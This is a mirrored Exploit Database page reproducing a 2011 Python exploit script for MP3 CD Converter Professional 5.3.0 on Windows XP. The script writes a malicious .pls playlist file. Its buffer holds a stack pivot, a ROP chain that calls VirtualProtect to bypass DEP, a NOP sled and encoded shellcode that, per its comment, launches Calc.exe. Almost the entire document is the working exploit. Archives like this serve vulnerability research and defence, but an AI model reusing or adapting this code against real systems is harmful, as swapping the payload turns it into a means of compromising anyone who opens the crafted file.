MP3 CD Converter Professional 5.3.0 – Universal DEP Bypass

• Exploit Database
• 16 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-08-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17654/

• #!/usr/bin/python
  #
  #[+]Exploit Title: MP3 CD Converter Professional Universal DEP Bypass Exploit
  #[+]Date: 11\08\2011
  #[+]Author: C4SS!0 G0M3S
  #[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
  #[+]Version: 5.3.0
  #[+]Tested On: WIN-XP SP3 Brazilian Portuguese
  #[+]CVE: N/A
  #
  
  from struct import pack
  from time import sleep
  from sys import exit
  print '''
  
  		Created By C4SS!0 G0M3S
  		E-mail louredo_@hotmail.com
  		Blog net-fuzzer.blogspot.com
  '''
  sleep(2)
  
  shellcode = ("\xba\xcb\x38\xf3\xb9\xd9\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9" 
  "\xb1\x32\x83\xef\xfc\x31\x57\x0e\x03\x9c\x36\x11\x4c\xde" 
  "\xaf\x5c\xaf\x1e\x30\x3f\x39\xfb\x01\x6d\x5d\x88\x30\xa1" 
  "\x15\xdc\xb8\x4a\x7b\xf4\x4b\x3e\x54\xfb\xfc\xf5\x82\x32" 
  "\xfc\x3b\x0b\x98\x3e\x5d\xf7\xe2\x12\xbd\xc6\x2d\x67\xbc" 
  "\x0f\x53\x88\xec\xd8\x18\x3b\x01\x6c\x5c\x80\x20\xa2\xeb" 
  "\xb8\x5a\xc7\x2b\x4c\xd1\xc6\x7b\xfd\x6e\x80\x63\x75\x28" # Shellcode WinExec "Calc.exe"
  "\x31\x92\x5a\x2a\x0d\xdd\xd7\x99\xe5\xdc\x31\xd0\x06\xef" # BadChars "\x00\x3d"
  "\x7d\xbf\x38\xc0\x73\xc1\x7d\xe6\x6b\xb4\x75\x15\x11\xcf" 
  "\x4d\x64\xcd\x5a\x50\xce\x86\xfd\xb0\xef\x4b\x9b\x33\xe3" 
  "\x20\xef\x1c\xe7\xb7\x3c\x17\x13\x33\xc3\xf8\x92\x07\xe0" 
  "\xdc\xff\xdc\x89\x45\xa5\xb3\xb6\x96\x01\x6b\x13\xdc\xa3" 
  "\x78\x25\xbf\xa9\x7f\xa7\xc5\x94\x80\xb7\xc5\xb6\xe8\x86" 
  "\x4e\x59\x6e\x17\x85\x1e\x80\x5d\x84\x36\x09\x38\x5c\x0b" 
  "\x54\xbb\x8a\x4f\x61\x38\x3f\x2f\x96\x20\x4a\x2a\xd2\xe6" 
  "\xa6\x46\x4b\x83\xc8\xf5\x6c\x86\xaa\x98\xfe\x4a\x2d")
  ################################ROP START HERE############################################
  rop = pack('<L',0x00425C69) * 4 # RETN
  rop += pack('<L',0x0045125a) # PUSH ESP # POP ESI # RETN 04 
  rop += pack('<L',0x00425C69) * 2 # RETN
  rop += pack('<L',0x0046194c) # XCHG EAX,ESI # RETN 
  rop += pack('<L',0x0040d8b1) # XCHG EAX,ECX # CLD # ADD AL,0 # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,8 # RETN 04 
  rop += "A" * 24 # JUNK
  rop += pack('<L',0x00425C69) * 2 # RETN
  rop += pack('<L',0x10008d68) # POP EDI # RETN
  rop += pack('<L',0x00425C69) # RETN
  rop += pack('<L',0x1000176a) # POP EBP # RETN 
  rop += pack('<L',0x004319e6) # PUSH ESP # RETN // Endereco de retorno da funcao VirtualProtect
  rop += pack('<L',0x0043017a) # POP EBX # RET
  rop += pack('<L',0x00000500) # Valor de dwSize
  rop += pack('<L',0x004078f6) # POP EDX # ADD EAX,4C48300 # POP ESI # RETN 
  rop += pack('<L',0x00000040) # Valor de flNewProtect
  rop += "BBBB" # JUNK
  rop += pack('<L',0x0040dc8c) # POP ESI # RETN 
  rop += pack('<L',0x01E5225F) # JMP DWORD PTR DS:[EAX] // Jmp to eax, EAX == VirtualProtect 
  rop += pack('<L',0x00444ad3) # POP EAX # RETN
  rop += pack('<L',0x007EC070) # Ponteiro para VirtualProtect
  rop += pack('<L',0x1000734d) # PUSHAD # RETN
  ################################ROP END HERE###############################################
  buf = ("A" * 16)
  buf += pack('<L',0x00456333) # ADD ESP,318 # RETN 4
  buf += ("B" * (784-len(buf)))
  buf += pack('<L',0x004462D0) # ADD ESP,51C # RETN
  buf += ("A" * 24)
  buf += rop
  buf += "\x90" * 10 
  buf += shellcode
  buf += "C" * 50000
  print "\t\t[+]Creating Exploit File..."
  sleep(1)
  try:
  	f = open("Exploit.pls","wb")
  	f.write(buf)
  	f.close()
  	print "\t\t[+]File \"Exploit.pls\" Created Succefully."
  	sleep(1)
  exceptIOError,e:
  	print "\t\t[+]Error: "+str(e)
  	exit(-1)